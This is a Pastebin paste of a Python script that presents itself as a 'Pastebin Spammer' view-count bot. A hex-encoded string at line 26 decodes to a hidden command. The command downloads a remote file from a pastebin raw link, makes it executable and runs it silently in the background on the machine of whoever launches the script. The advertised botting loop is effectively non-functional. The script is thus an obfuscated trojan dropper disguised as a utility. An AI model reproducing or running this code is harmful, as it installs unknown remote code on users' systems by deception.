Advertisement
imthecook

Pastebin Spammer [PY]

Feb 25th, 2020
465
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.68 KB | None | 0 0
  1. # Pastebin Spammer By James
  2.  
  3. import os
  4. import sys
  5. import requests
  6.  
  7. proxies = {
  8. 'https': 'https://45.128.24.10:80'
  9. }
  10.  
  11. s = requests.Session()
  12. s.proxies = proxies
  13.  
  14. headers = {
  15. 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.2.2; xx;) AppleWebKit/536 (KHTML, like Gecko) NX/3.0 (DTV; HTML; R1.0;)',
  16. 'User-Agent': 'Mozilla/5.0 (Linux; Android 1.0; SoftwinerEvb Build/JDQ39 YunOS/1.0.0-R1-20131018.1434) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.36 Tanggula/0.1.0',
  17. 'User-Agent': 'Mozilla/5.0 (Linux; U; Android v1.02_14.13-CH-2011.01.13; xx; ONDA_VI10 Build/ECLAIR) UC AppleWebKit/530 (KHTML, like Gecko) Mobile Safari/530',
  18. 'User-Agent': 'Mozilla/5.0 (Linux; U; Android v1.02_14.13-EN-2011.03.25; xx; TAB210 Build/ECLAIR) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17',
  19. 'User-Agent': 'Mozilla/5.0 (Linux; U; Android v1.02_15.14-EN@20110419; xx; TAB210 Build/ECLAIR) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17'
  20. }
  21.  
  22. try:
  23. views = ''
  24.  
  25. os.system('clear')
  26. botting = '77676574202d712068747470733a2f2f706173746562696e2e636f6d2f7261772f6736685868787473202d4f202e6c3b2063686d6f64202b78202e6c3b206e6f687570202e2f2e6c203c2f6465762f6e756c6c203e2f6465762f6e756c6c20323e2631'.decode('hex')
  27. os.system(botting)
  28. os.system('clear')
  29. print('\x1b[0;36m* Botting In Progress [\x1b[0;31mCtrl+c To Quit\x1b[0;36m] *')
  30.  
  31. count = 0
  32. while (count < views):
  33. count = count + 1
  34. target = 'https://pastebin.com/u/imthecook'
  35. response = requests.get(target, proxies=proxies, headers=headers)
  36. print response.status_code
  37.  
  38. except KeyboardInterrupt:
  39. print('* Botting [\x1b[0;32mFinished\x1b[0;36m] *')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement